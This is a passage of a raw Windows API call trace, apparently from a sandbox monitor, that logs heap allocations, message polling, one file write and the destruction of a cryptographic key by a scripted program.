hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0248.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0248.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0248.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0248.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0248.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48e8) returned 0x3bf0050 [0248.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2acc0 | out: hHeap=0x970000) returned 1 [0248.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0248.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0248.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0248.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0248.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0248.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0248.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0248.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0248.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0248.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0248.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0248.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0248.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48e8) returned 0x2f14010 [0248.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0248.048] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x48e8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x48e8, lpOverlapped=0x0) returned 1 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0248.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0248.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0248.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0248.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0248.051] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0248.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0248.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ff8 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0248.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0248.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0248.051] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0248.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0248.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0248.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0248.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0248.052] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0248.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0248.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0248.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0248.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0248.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0248.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0248.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0248.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0248.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0248.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0248.053] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0248.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0248.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0248.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0248.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0248.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0248.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0248.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0248.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0248.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0248.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51628, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0248.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0248.054] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0248.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0248.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0248.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.054] CryptDestroyKey (hKey=0xa87490) returned 1 [0248.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0248.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0248.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0248.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0248.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0248.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0248.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0248.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0248.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0248.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0248.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0248.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0248.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0248.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0248.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0248.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0248.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0248.056] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0248.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0248.056] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0248.057] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0248.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0248.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.057] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0248.057] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0248.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0248.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.057] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0248.057] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0248.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0248.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.058] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0248.058] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0248.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0248.058] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0248.058] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0248.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0248.058] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 